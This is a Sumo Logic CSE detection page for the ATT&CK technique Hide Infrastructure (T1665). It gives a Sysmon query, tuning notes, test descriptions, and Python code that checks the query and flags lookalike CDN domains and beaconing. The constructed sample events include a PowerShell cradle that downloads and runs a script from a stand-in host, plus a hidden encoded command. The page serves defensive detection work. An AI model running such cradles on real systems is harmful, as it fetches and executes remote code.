T1665 Sumo Logic CSE · Sumo

Detect Hide Infrastructure in Sumo Logic CSE

This detection identifies adversary attempts to conceal command and control infrastructure through domain masquerading, traffic filtering, and proxy chaining. Specific patterns include processes making DNS queries to domains that impersonate legitimate CDN or cloud providers (typosquatting or lookalike domains), unusual processes initiating connections through multi-hop proxy chains, beaconing to URL shorteners or marketing redirect services, and network connections where resolved IPs do not match the expected ASN for the queried domain. The detection targets techniques used by groups such as APT29 (residential proxy routing), Salt Typhoon (JumbledPath hop chains), and DarkGate (CDN masquerading) to extend the operational lifetime of C2 infrastructure by evading automated takedown and sandbox analysis.

MITRE ATT&CK

Tactic: Command and Control
Technique: T1665 Hide Infrastructure
Canonical reference: https://attack.mitre.org/techniques/T1665/

Sumo Detection Query

Sumo Logic CSE (Sumo)

```
_sourceCategory=windows/sysmon EventCode=1
| json auto
| where process_name in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
| where process_cmdline matches /(-enc|-encodedcommand|-bypass|-hidden|invoke-expression|iex\s)/i
    OR process_cmdline matches /(http:\/\/|https:\/\/|ftp:\/\/)/i
| if(process_cmdline matches /-enc/i, "EncodedCommand",
    if(process_cmdline matches /-bypass/i, "BypassExecution",
    if(process_cmdline matches /(invoke-expression|iex)/i, "ScriptExecution",
    "SuspiciousProcess"))) as detection_type
| if(parent_process_name in ("w3wp.exe","httpd.exe","nginx.exe"), 95,
    if(process_cmdline matches /-enc/i, 85,
    if(process_cmdline matches /-bypass/i, 75, 60))) as risk_score
| where risk_score >= 60
| count by host, user, process_name, process_cmdline, parent_process_name, detection_type, risk_score
| sort by risk_score desc
```

Severity: high. Confidence: medium.

Sumo Logic detection for Hide Infrastructure (T1665). The query parses Sysmon Event ID 1 process-creation records with `json auto`, keeps only the scripting hosts and LOLBins listed in the first `where`, selects command lines that carry encoded-command, bypass, hidden-window or download-cradle indicators or an embedded URL, labels each hit with a detection_type, and assigns a risk_score that is highest when the parent is a web-server process (a common sign of a web shell spawning the command).
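To make the query's stages checkable offline, here is the same filter, classification and scoring logic in Python, run over a handful of constructed Sysmon Event ID 1 records. This is an added example, not code from the page or from Sumo Logic; the sample events, hostnames and command lines are made up, and the field names follow the query rather than any particular Sumo parser.

```python
import re
from collections import Counter

# Constructed Sysmon Event ID 1 records, shaped like the fields the query reads
# after "| json auto". These are made-up samples, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "process_name": "powershell.exe",
     "process_cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
     "parent_process_name": "explorer.exe"},
    {"host": "web01", "user": "IIS APPPOOL\\site", "process_name": "cmd.exe",
     "process_cmdline": "cmd.exe /c powershell -ep bypass -c iex (New-Object Net.WebClient)"
                        ".DownloadString('http://cdn.example.invalid/a')",
     "parent_process_name": "w3wp.exe"},
    {"host": "ws02", "user": "CORP\\bob", "process_name": "wscript.exe",
     "process_cmdline": "wscript.exe C:\\scripts\\sync.vbs https://files.example.invalid/update",
     "parent_process_name": "explorer.exe"},
    {"host": "ws03", "user": "CORP\\carol", "process_name": "notepad.exe",
     "process_cmdline": "notepad.exe C:\\notes.txt", "parent_process_name": "explorer.exe"},
    {"host": "ws04", "user": "CORP\\dave", "process_name": "powershell.exe",
     "process_cmdline": "powershell.exe Get-ChildItem", "parent_process_name": "explorer.exe"},
]

# Mirrors the query's process list and its two "where" regexes.
WATCHED_PROCESSES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
SUSPICIOUS_FLAGS = re.compile(r"(-enc|-encodedcommand|-bypass|-hidden|invoke-expression|iex\s)", re.I)
EMBEDDED_URL = re.compile(r"(http://|https://|ftp://)", re.I)
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe"}


def matches_filter(event):
    """The two 'where' stages: watched process AND (suspicious flag OR embedded URL)."""
    cmd = event["process_cmdline"]
    return event["process_name"] in WATCHED_PROCESSES and bool(
        SUSPICIOUS_FLAGS.search(cmd) or EMBEDDED_URL.search(cmd))


def classify(cmdline):
    """The nested if() that yields detection_type; first matching branch wins."""
    if re.search(r"-enc", cmdline, re.I):
        return "EncodedCommand"
    if re.search(r"-bypass", cmdline, re.I):
        return "BypassExecution"
    if re.search(r"(invoke-expression|iex)", cmdline, re.I):
        return "ScriptExecution"
    return "SuspiciousProcess"


def risk_score(event):
    """The nested if() that yields risk_score; a web-server parent outranks every flag."""
    cmd = event["process_cmdline"]
    if event["parent_process_name"] in WEB_SERVER_PARENTS:
        return 95
    if re.search(r"-enc", cmd, re.I):
        return 85
    if re.search(r"-bypass", cmd, re.I):
        return 75
    return 60


def run_detection(events, min_risk=60):
    """Apply the whole pipeline; rows resemble '| count by ... | sort by risk_score desc'."""
    counts = Counter()
    for ev in events:
        if not matches_filter(ev):
            continue
        score = risk_score(ev)
        if score < min_risk:
            continue
        counts[(ev["host"], ev["user"], ev["process_name"], ev["process_cmdline"],
                ev["parent_process_name"], classify(ev["process_cmdline"]), score)] += 1
    columns = ("host", "user", "process_name", "process_cmdline", "parent_process_name",
               "detection_type", "risk_score", "_count")
    rows = [dict(zip(columns, key + (n,))) for key, n in counts.items()]
    return sorted(rows, key=lambda r: -r["risk_score"])


if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["risk_score"], row["detection_type"], row["host"], row["process_cmdline"][:60])
```

Running it surfaces a tuning point worth knowing before deploying the query: the `-bypass` pattern only matches the literal token `-bypass`, so `-ep bypass` or `-ExecutionPolicy Bypass` (the forms PowerShell actually accepts) never reach the BypassExecution branch or the 75 score; the web01 sample lands on ScriptExecution only because `iex` is present. Widening that pattern to something like `(-ep|-executionpolicy)\s+bypass` is a reasonable local change if your environment produces that form.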

Data Sources

  • Sumo Logic Cloud SIEM
  • Windows Event Logs
  • Endpoint Telemetry

Required Tables

_sourceCategory=windows/sysmon OR _sourceCategory=endpoint/process

False Positives & Tuning

  • Legitimate software updaters or telemetry agents that use CDN-like domain naming conventions for load distribution
  • IT automation scripts (Ansible, Chef, Puppet) that download packages from CDN mirrors with non-standard naming
  • URL shorteners used legitimately by collaboration tools (Slack, Teams bot integrations) where the bot process may be PowerShell-based

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: CDN Masquerading DNS Query from PowerShell

    Expected signal: Sysmon Event ID 22 (DNS query) for each domain queried, with Image pointing to powershell.exe and the QueryName field containing each CDN-lookalike domain. Also generates Sysmon Event ID 1 for the PowerShell process creation.

  2. Test 2: URL Shortener C2 Redirect Simulation

    Expected signal: Sysmon Event ID 1 for cmd.exe spawning powershell.exe (suspicious process chain), Sysmon Event ID 22 for DNS queries to bit.ly and tinyurl.com, Sysmon Event ID 3 for outbound TCP connections to those domains on port 443.

  3. Test 3: SOCKS Proxy Tunnel Creation via SSH Dynamic Forwarding

    Expected signal: Sysmon Event ID 1 for ssh.exe with CommandLine containing the '-D 1080' dynamic forwarding argument. Sysmon Event ID 3 for an attempted TCP connection to localhost:2222. Security Event ID 4688 if process creation auditing is enabled.

  4. Test 4: High-Frequency Beacon Simulation from Scripting Engine

    Expected signal: 25 Sysmon Event ID 3 entries for outbound TCP connections from powershell.exe to the same destination IP on port 443, with consistent 2-second intervals visible in event timestamps. Sysmon Event ID 1 for powershell.exe process creation.
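The description at the top of the page and Tests 1 and 4 both name signals the shipped query does not itself inspect: lookalike CDN domains in Sysmon Event ID 22 and fixed-interval connections in Sysmon Event ID 3. The following added example (not code from the page, Sumo Logic or Atomic Red Team) shows how a defender would check both on the telemetry those tests generate. It assumes Sysmon's own field names (Image, QueryName, DestinationIp, DestinationPort, UtcTime), a hand-picked list of real CDN registrable domains and brand tokens, a naive "last two labels" notion of registrable domain, and arbitrary thresholds of at least 5 connections with a coefficient of variation of the gaps at or below 0.2; the sample records are constructed, with six beacon connects instead of Test 4's 25 to keep the listing short.

```python
import statistics
from datetime import datetime
from itertools import groupby

# Constructed Sysmon records using Sysmon's own field names; not real telemetry.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
DNS_EVENTS = [  # Sysmon Event ID 22 (DNS query)
    {"Image": PS, "QueryName": "d111111abcdef8.cloudfront.net"},   # genuine CDN host
    {"Image": PS, "QueryName": "cdn.cloudfrnt.net"},               # one-character typosquat
    {"Image": PS, "QueryName": "static.akamaihd-cdn.xyz"},         # brand inside a foreign domain
    {"Image": "C:\\Program Files\\Updater\\updater.exe", "QueryName": "updates.example-vendor.com"},
]
NET_EVENTS = [  # Sysmon Event ID 3 (network connection); six connects exactly 2 s apart
    {"Image": PS, "DestinationIp": "203.0.113.10", "DestinationPort": 443,
     "UtcTime": f"2024-05-01 10:00:{2 * i:02d}.000"} for i in range(6)
]
NET_EVENTS += [  # a browser's irregular connects to one host, for contrast
    {"Image": "C:\\Program Files\\Browser\\browser.exe", "DestinationIp": "198.51.100.7",
     "DestinationPort": 443, "UtcTime": t}
    for t in ("2024-05-01 10:00:01.000", "2024-05-01 10:00:09.500", "2024-05-01 10:00:11.000",
              "2024-05-01 10:00:40.000", "2024-05-01 10:00:41.250")
]

# Assumed reference set of real CDN/cloud registrable domains; extend from your own allow-list.
KNOWN_CDN = sorted({"cloudfront.net", "akamaihd.net", "azureedge.net", "cloudflare.com", "fastly.net"})
BRAND_TOKENS = sorted({"cloudfront", "akamai", "azureedge", "cloudflare", "fastly"})


def levenshtein(a, b):
    """Plain edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """Naive registrable domain = last two labels. Use the Public Suffix List in production."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def lookalike_reason(query_name):
    """Return why a queried name looks like a CDN impersonation, or None if it does not."""
    reg = registrable(query_name)
    if reg in KNOWN_CDN:
        return None  # the provider's real domain, e.g. a legitimate CloudFront distribution
    for known in KNOWN_CDN:
        dist = levenshtein(reg, known)
        if 0 < dist <= 2:
            return f"edit distance {dist} from {known}"
    for brand in BRAND_TOKENS:
        if brand in query_name.lower():
            return f"contains CDN brand '{brand}' outside the provider's domain"
    return None


def scan_dns(events):
    """Event ID 22 sweep: (Image, QueryName, reason) for every lookalike hit."""
    return [(e["Image"], e["QueryName"], r) for e in events if (r := lookalike_reason(e["QueryName"]))]


def beacon_candidates(events, min_connections=5, max_cv=0.2):
    """Event ID 3 sweep: flag (Image, destination) pairs whose connection gaps are near-constant."""
    key = lambda e: (e["Image"], e["DestinationIp"], e["DestinationPort"])
    ordered = sorted(events, key=lambda e: (key(e), e["UtcTime"]))
    findings = []
    for k, group in groupby(ordered, key=key):
        times = [datetime.strptime(e["UtcTime"], "%Y-%m-%d %H:%M:%S.%f") for e in group]
        if len(times) < min_connections:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")  # coefficient of variation
        if cv <= max_cv:
            findings.append({"image": k[0], "dest": f"{k[1]}:{k[2]}", "connections": len(times),
                             "mean_interval_s": round(mean, 2), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for hit in scan_dns(DNS_EVENTS):
        print("lookalike:", hit)
    for b in beacon_candidates(NET_EVENTS):
        print("beacon:", b)
```

The two checks are deliberately separate pivots on the same host: a lookalike DNS hit with no beacon, or a beacon to a plain IP with no DNS at all, are each worth a look on their own, and the false-positive list above applies to both (updaters and configuration-management agents poll on fixed timers too, so the beacon threshold should be tuned per process rather than globally).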
